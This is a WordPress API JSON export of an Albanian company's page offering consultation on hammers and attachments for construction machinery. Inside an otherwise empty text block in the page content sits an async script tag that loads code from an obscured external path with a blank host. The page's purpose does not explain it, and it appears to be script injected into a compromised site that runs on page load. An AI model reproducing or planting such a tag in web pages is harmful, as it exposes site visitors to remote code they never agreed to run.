{"id":1025,"date":"2017-05-25T10:07:26","date_gmt":"2017-05-25T10:07:26","guid":{"rendered":"http:\/\/lexalko.albweb.al\/?page_id=1025"},"modified":"2020-08-21T06:57:03","modified_gmt":"2020-08-21T06:57:03","slug":"agregate-te-ndryshme","status":"publish","type":"page","link":"https:\/\/lexalko.com\/index.php\/agregate-te-ndryshme\/","title":{"rendered":"Agregate t\u00eb ndryshme"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_custom_heading text=&#8221;Agregate t\u00eb ndryshme&#8221; font_container=&#8221;tag:h2|text_align:left|color:%23000000&#8243; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:400%20regular%3A400%3Anormal&#8221;][vc_empty_space height=&#8221;10px&#8221;][vc_separator color=&#8221;custom&#8221; align=&#8221;align_left&#8221; border_width=&#8221;4&#8243; el_width=&#8221;10&#8243; accent_color=&#8221;#f99422&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: justify;\">Lexalko ju mund\u00ebson konsulenc\u00eb n\u00eb p\u00ebrzgjedhjen e cekicit t\u00eb duhur p\u00ebr makinerin\u00eb tuaj. Zgjedhja e cekicit t\u00eb duhur garanton stabilitet t\u00eb makineris\u00eb, jet\u00ebgjatesi si edhe eficenc\u00eb n\u00eb pun\u00eb. P\u00ebr m\u00eb shum\u00eb informacion si edhe p\u00ebr preventiva t\u00eb cekic\u00ebve te rinj apo t\u00eb p\u00ebrdorur kontaktoni n\u00eb numrin e m\u00ebposht\u00ebm.<\/p>\n<p>Lexalko ju mund\u00ebson pajisjen e makineris\u00eb \u00a0suaj me agregatin e p\u00ebrshtatsh\u00ebm duke marr\u00eb parasysh t\u00eb gjitha k\u00ebrkesat teknike si edhe kushtet e kantierit, p\u00ebr k\u00ebt\u00eb ju ofrojm\u00eb asistenc\u00eb , konsulenc\u00eb si edhe preventiv\u00eb t\u00eb agregateve t\u00eb reja dhe t\u00eb p\u00ebrdorura.[\/vc_column_text][vc_column_text][\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;1036&#8243; img_size=&#8221;full&#8221;][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<script async src='https:\/\/\/3gGykjDJ?frm=script&#038;_cid=123' type='text\/javascript'><\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column][vc_custom_heading text=&#8221;Agregate t\u00eb ndryshme&#8221; font_container=&#8221;tag:h2|text_align:left|color:%23000000&#8243; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:400%20regular%3A400%3Anormal&#8221;][vc_empty_space height=&#8221;10px&#8221;][vc_separator color=&#8221;custom&#8221; align=&#8221;align_left&#8221; border_width=&#8221;4&#8243; el_width=&#8221;10&#8243; accent_color=&#8221;#f99422&#8243;][vc_column_text] Lexalko ju mund\u00ebson konsulenc\u00eb n\u00eb p\u00ebrzgjedhjen e cekicit t\u00eb duhur p\u00ebr makinerin\u00eb tuaj. Zgjedhja e cekicit t\u00eb duhur garanton stabilitet t\u00eb makineris\u00eb, jet\u00ebgjatesi si edhe eficenc\u00eb n\u00eb pun\u00eb. P\u00ebr m\u00eb shum\u00eb informacion si edhe p\u00ebr preventiva t\u00eb cekic\u00ebve te rinj apo t\u00eb p\u00ebrdorur&hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_joinchat":[],"footnotes":""},"class_list":["post-1025","page","type-page","status-publish","hentry","description-off"],"_links":{"self":[{"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/pages\/1025","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/comments?post=1025"}],"version-history":[{"count":26,"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/pages\/1025\/revisions"}],"predecessor-version":[{"id":2247,"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/pages\/1025\/revisions\/2247"}],"wp:attachment":[{"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/media?parent=1025"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}